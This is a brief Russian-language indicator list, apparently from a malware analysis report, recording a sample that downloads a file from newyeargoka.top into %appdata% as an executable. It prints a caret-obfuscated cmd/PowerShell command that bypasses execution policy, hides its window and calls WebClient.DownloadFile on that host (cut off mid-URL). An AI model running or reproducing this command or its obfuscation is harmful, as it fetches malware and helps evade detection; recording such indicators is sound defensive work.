Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWeR^S^h^eLL^.^EXe -Exe^cUTiO^npol^i^C^Y ByPa^SS -NOpROF^Ile -wIN^dO^WsTYle^ HId^Den ^(n^e^W-o^BJeCt^ ^sYs^tem.^nET^.W^EBc^l^IEnt)^.d^oWnLOadfI^le^(^'http://newyeargoka.top/...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "POWeR^S^h^eLL^.^EXe -Exe^cUTiO^npol^i^C^Y ByPa^SS -NOpROF^Ile -wIN^dO^WsTYle^ HId^Den ^(n^e^W-o^BJeCt^ ^sYs^tem.^nET^.W^EBc^l^IEnt)^.d^oWnLOadfI^le^(^'http://newyeargoka.top/...' (со скрытым окном)